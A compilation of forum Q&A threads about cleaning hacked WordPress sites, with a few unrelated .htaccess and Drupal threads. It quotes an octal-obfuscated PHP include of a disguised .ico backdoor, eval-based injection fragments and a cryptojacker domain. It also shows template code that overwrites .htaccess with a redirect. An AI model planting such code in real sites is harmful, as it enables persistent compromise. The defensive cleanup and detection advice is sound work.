My htaccess files keep changing on all my wordpress websites - wordpress

I have two WordPress websites on my dedicated server, and the .htaccess files of both websites keep changing to the default one and become chmod 444.
Even after I fix it and set my own file to chmod 444, a few days later it changes again on both websites.
Could you please help me make the htaccess files impossible to be overwritten or edited no matter what?
I will appreciate any help,
Thank you

I found my infected file in one of the WordPress themes, so you have two ways:
Log in to WordPress and delete all the new themes that you are not using.
Go to your admin page, then go to the folder: wp-content/themes/sydney/404.php
Open it, and if you see the virus code (for example, if it has +xml or Rewrite wordpress etc.), delete it.
Go through the 404.php pages in all the theme folders.
Change your WP login user name and password.
Delete all the infected .htaccess files or remove the infected code, monitor your website regularly, and check your .htaccess file to make sure you don't get attacked again.

I have resolved this by scanning my Ubuntu server using ClamAV through SSH.
Here is the command line I used:
clamscan -ril /home/user/clamav.txt
The results revealed a backdoor script embedded in one of my old themes, which wasn't even activated. I deleted that old theme entirely and rebooted my server, and then the problem was gone.
Don't waste your time with a WordPress plugin to scan for malware or backdoors, because that is unlikely to locate any virus. Install ClamAV on your server, then scan. If nothing is detected yet, install another antivirus similar to ClamAV until you succeed in locating the threat.

Related

My wordpress website being hacked with code eval($_SERVER['HTTP_81DB2B3']

I have a problem with my website: I got information from Wordfence that my WordPress website was hacked,
and found the code eval($_SERVER['HTTP_81DB2B3'], so I removed it, but within a few seconds the code comes back. Someone, please help me.
I had something very similar to this. Go to your cPanel and search for "Cron Jobs" and scroll down to see if there's any malicious cronjobs setup. You might have some that look like eval(gzinflate(base64_decode(.... that are essentially causing this to reoccur. Not a complete fix to this issue, but you'll have to delete those cronjobs to ensure that that line of code doesn't keep reappearing. In addition to that, you'll also need to make sure those cronjobs don't show up again. Use a plugin like Wordfence (suggested above as well) to look for malicious files and if it helps replace your home directory (except for wp-content and wp-config) with fresh files.
If your website got hacked, then I guess more than one file was affected by it.
Case 1: If you are able to access the WordPress backend
In this case, I suggest you:
Step 1: Add the plugin called Wordfence Security – Firewall & Malware Scan and scan your website with it.
Step 2: After scanning the site, remove all suspicious code from the site.
Case 2: If you are not able to access the WordPress backend, then you have to update WordPress manually with the hosting file manager or FTP.
Please note: Please take a backup of your website before making any changes.

WP site keeps getting hacked for a cryptojacker - How to find the leak?

I've got a site that has been hacked for the fourth time now this month, with scripts hosted on autofaucet.org. (Sloppy code even, found their names. Some Russian dudes. But that's off topic.) I've taken some measures to prevent a new hack, but alas...
I've installed a clean WP installation on the server, with clean files and a clean DB.
Reinstalled the plugins clean.
I have the All In One WP Security & Firewall plugin for file scanning, firewall, hiding the login page, etc.
Changed all the WordPress passwords.
I've noticed the encoded code is being placed in files called assets.php.
I'm curious how a hacker would inject/place the code on the server. How to prevent it better and what questions to ask the webhost company. I've asked them before and they just say it's my fault, update the wp installation and move on. What should they check if the code is injected from their side?
Your log files (of the web server) e.g. /var/log/nginx/access.log with the nginx web server will tell you who it was. Look for the change date/time of the assets.php file. Then check server access logs for IP addresses from that exact time. Then search logs for that IP address. You will find the first accesses by that IP address. That was likely the hack.
Usually Wordpress plugins are to blame as long as you keep the WP site updated. So, you could disable plugins not needed urgently, and disable the others one by one, or all for testing.
As a workaround, you can make the index.php (or other) file under attack read-only. In the past I have worked around particular attacks by chown root.root filetobeattacked.php which usually works (but may hinder updates, so it's a temporary solution). If you are not root on the server (shared hosting) perhaps chmod 444 filetobeattacked.php could work.
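The correlation this answer describes, as an added example that is not part of the original answer: take the modification time of assets.php, list the client IPs seen in the access log around that moment, then pull each suspect's full history. The log lines, IP addresses, plugin path and timestamp are constructed sample data in nginx combined format.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample data (nginx "combined" format); not from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2019:03:10:02 +0000] "GET /wp-login.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2019:09:14:40 +0000] "GET /wp-content/plugins/example-plugin/readme.txt HTTP/1.1" 200 512 "-" "curl/7.58.0"
192.0.2.44 - - [14/Mar/2019:02:30:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [14/Mar/2019:02:31:07 +0000] "POST /wp-content/plugins/example-plugin/ajax.php HTTP/1.1" 200 31 "-" "curl/7.58.0"
198.51.100.23 - - [14/Mar/2019:02:31:09 +0000] "GET /wp-content/uploads/assets.php HTTP/1.1" 200 0 "-" "curl/7.58.0"
"""
# On a real server: datetime.fromtimestamp(os.path.getmtime(path), tz=timezone.utc)
ASSETS_MTIME = datetime(2019, 3, 14, 2, 31, 8, tzinfo=timezone.utc)

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def parse(log_text):
    """Return (ip, time, method, path, status) tuples for every parseable line."""
    entries = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            when = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
            entries.append((m.group(1), when, m.group(3), m.group(4), int(m.group(5))))
    return entries

def suspects_near(entries, mtime, window_s=120):
    """IPs seen within window_s seconds of mtime; those that sent POST/PUT come first."""
    near = [e for e in entries if abs(e[1] - mtime) <= timedelta(seconds=window_s)]
    wrote = {e[0] for e in near if e[2] in ("POST", "PUT")}
    return sorted({e[0] for e in near}, key=lambda ip: (ip not in wrote, ip))

def history(entries, ip):
    """Every request from one IP, oldest first; the earliest ones show the way in."""
    return sorted((e for e in entries if e[0] == ip), key=lambda e: e[1])

if __name__ == "__main__":
    entries = parse(SAMPLE_LOG)
    for ip in suspects_near(entries, ASSETS_MTIME):
        print(ip)
        for _, when, method, path, status in history(entries, ip):
            print("   ", when.isoformat(), method, path, status)
```

A file's mtime can be reset after the fact, so compare it with the inode change time (ctime) before trusting the window.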
I had the same issue before. It might be the WordPress core files.
Delete all files except wp-content, then download and replace them with the new WordPress files.
Search for 'autofaucet.org' inside wp-content, and remove if necessary.
Open wp-content/themes/ then check functions.php - check if any additional code is there on top. Check the last updated files and time inside the theme and plugins.
Export the database files, search for 'autofaucet.org', and remove any item found.

Wordpress site hacked?

It looks like my WordPress site has been hacked. The following code snippet was in index.php, wp-config.php:
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and set a strong password and username
Changed cPanel/FTP password to a strong one
Implemented iTheme Security
Updated WordPress to the latest version (themes and plugins)
However, the code appeared again. What would be good solutions?
p.s. I am using siteground.
Thanks
Yeah, someone is including a .ico file (open it with a text editor, and you will see it is some PHP code and no real ico file):
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow, despite your changes of host and passwords, your hacker is able to get in. Once they are in, they can set up all sorts of backdoors to keep access; any .php file of theirs can do this.
At the moment, closing the initial front door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. You'll have to replace all files with fresh downloads. Mostly it's straightforward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install, but take a GOOD look at it. Usually it also has some virus/backdoors in it, usually easy to see and remove. Now you're already connected with your DB.
Examine the saved uploads folder for files that shouldn't be there, like PHP files. Then upload it to the new folder.
Reinstall all plugins, fresh downloads
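The question's snippet hides its include target behind octal escapes, and the answers above note that the .ico file is really PHP and that the uploads folder should be checked for PHP files. As an added example (not code from the thread), this decodes such include paths and lists files that contain PHP but carry another extension; PHP_EXT and the 4096-byte read limit are assumptions.

```python
import re
from pathlib import Path

# The include line quoted in the question above, kept byte-for-byte.
SNIPPET = r'''#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";'''

ESC_RE = re.compile(r'\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})')
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"')
PHP_EXT = {".php", ".phtml", ".inc"}  # assumption: extensions this site treats as PHP

def php_unescape(text):
    """Decode octal and hex escapes the way a PHP double-quoted string does."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8) & 0xFF)  # PHP keeps only the low byte
        return chr(int(m.group(2), 16))
    return ESC_RE.sub(repl, text)

def hidden_includes(php_source):
    """Decoded include targets that were escape-obfuscated or are not PHP files."""
    hits = []
    for raw in INCLUDE_RE.findall(php_source):
        target = php_unescape(raw)
        if target != raw or Path(target).suffix.lower() not in PHP_EXT:
            hits.append(target)
    return hits

def disguised_php(root):
    """Files under root that open with PHP code but lack a PHP extension."""
    found = []
    for path in Path(root).rglob("*"):  # rglob also returns dotfiles
        if path.is_file() and path.suffix.lower() not in PHP_EXT:
            with path.open("rb") as fh:
                if b"<?php" in fh.read(4096):
                    found.append(str(path))
    return sorted(found)

if __name__ == "__main__":
    print(hidden_includes(SNIPPET))
```

Run disguised_php over a downloaded copy of wp-content/uploads before re-uploading it, and hidden_includes over index.php and wp-config.php from the backup.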
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
You can also visit this link:
https://naderzad.info/web-development/wordpress-code-injection/

Editing .htaccess without FTP access through Wordpress

I have no access to my FTP but I'm able to edit the web through Wordpress. Is there any way I could perhaps generate the .htaccess file through the admin framework? I know there might be a plugin to do that, but bear in mind I have no FTP access and the plugins require it to be installed.
I need the .htaccess file to redirect the user to another site.
I know this might strike you as weird and stupid, but this is due to the company's central decision to keep the site hosted by, I guess, a "friendly" hosting company. There's no way of recovering the login/password for FTP, so this might be the only solution.
Please, try posting constructive comments only, no "contact the hosting company". If I could, I would.
If your hosting company has set up wordpress correctly, then there is no way to do this, because unix permissions should make .htaccess read-only to the owner of the web server.
If the company has not done this, and if you have a way to change the templates, you might have success by creating a template that contains php code to open and write the .htaccess file.
Sample code to be put at the top of the header.php:
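<?php
// Print the current working directory and, for each entry in it,
// whether the web server user can write to it.
echo 'Current dir: ', getcwd(), "<br>\n";
if ($handle = opendir('.')) {
    while (($file = readdir($handle)) !== false) {
        $ok = (is_writable($file) ? "ok" : "can't write");
        echo "file '$file': $ok<br>\n";
    }
    closedir($handle);
}
?>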
This is to test you're in the root directory of your wordpress installation. It should give you the current directory, a list of all files in that directory (expect .htaccess, index.php, and various wp-* files), and their writability.
Once you've checked everything is correct, add
file_put_contents('.test', "RewriteEngine On\nRewriteRule ^(.*)$ http://site.com/$1 [R=301,QSA,L]\n");
echo("<code><pre>-------- included file starts here\n");
include(".test");
echo("-------- included file ends here</pre></code>\n");
to the php code. This writes to a test file and includes it so you can check if everything is ok. When you've checked the file contents, replace .test with .htaccess.
WARNING: You should be VERY sure about the content of .htaccess. file_put_contents doesn't append the new string, it overwrites the whole file. Once you've written a bad .htaccess file, you might not be able to ever change it again, because the web server will redirect you to the new site instead of executing the script on the old site.
I am sorry for your situation. What is the hosting company? (I will keep this in mind if I ever use them.) To try to help:
Do you have access to CPanel? Most hosting providers give it out of the box. Cpanel has a file manager.
Research Wordpress file managers (http://wordpress.org/plugins/wp-filemanager/)
How to edit the WordPress .htaccess file from hosting cPanel: If you are currently unable to log in to your WordPress dashboard, or are facing a 500 internal server error, there is a 90% possibility that you were editing your .htaccess file from your WordPress dashboard. In this situation you can only fix your WordPress .htaccess file by editing it from cPanel. Editing the .htaccess file from the WordPress dashboard is a little risky with .htaccess editor plugins. If you implement any wrong code, then you might face a 500 internal server error and your site might crash. So first you should take a backup of your existing .htaccess file before editing it. If you have a backup of your WordPress .htaccess file, then you can also upload it through your hosting cPanel.
https://howtoways.com/how-to-edit-wordpress-htaccess-file-from-hosting-cpanel/

Clean URLs Broken after moving site to new host

I have copied an existing Drupal 6 site to a new host. I thought it was an easy task. Just change the MySQL login credentials and run. But obviously not. The first page is up and running, but all links to existing pages don't work.
What am I missing here? Another configuration I've missed?
The Drupal 6 installation is a NodeStream distribution.
Link to site:
http://u0002002.fsdata.se
It is likely that you forgot to set up mod_rewrite, so the nice URLs don't work.
It is almost certain mod_rewrite is not turned on; you can access pages like this:
http://u0002002.fsdata.se/?q=yrke-karriar
To resolve quickly:
Turn off clean urls (don't know the exact url in Drupal 6)
Flush all caches
This will resolve until you can get mod_rewrite turned on or working.
A very common (and even easier to fix) problem that happens when moving hosts is that you forget to include the .htaccess file which can cause problems with clean URLs too.
Fix: Upload a fresh copy of the .htaccess file that comes with Drupal to your web root directory.
I have found out that sometimes I miss this file. This is because I installed Drupal by dragging all the files and folders over to my server, but since the .htaccess file starts with a period, OS X hides it. This means that the .htaccess file was never moved over. - Source DrupalDude.com
And from Drupal.org directly, Clean URLs not working? Check your .htaccess file
Check if the .htaccess file was actually uploaded. It should be in the directory where you uploaded Drupal (for example: /public_html/drupal/)
If the .htaccess file is missing, you need to upload it. If you accidentally deleted this file, just download Drupal again, and copy the new .htaccess file.
Make sure the file is only called .htaccess and not htaccess.txt or anything else. The .period .at .the .beginning is required.
This name usually means that the file will be invisible on folder listings on Unix-based systems so you might not always see it. If using an FTP client, you may have to configure it to 'show hidden files'. If listing on the commandline, you must ls -la to see it. This will be somewhat dependent on your OS.
Here are two tutorials which may help you:
How to move a Drupal site from one host to another
How to Move a Drupal Site to a New Host Without Going Crazy
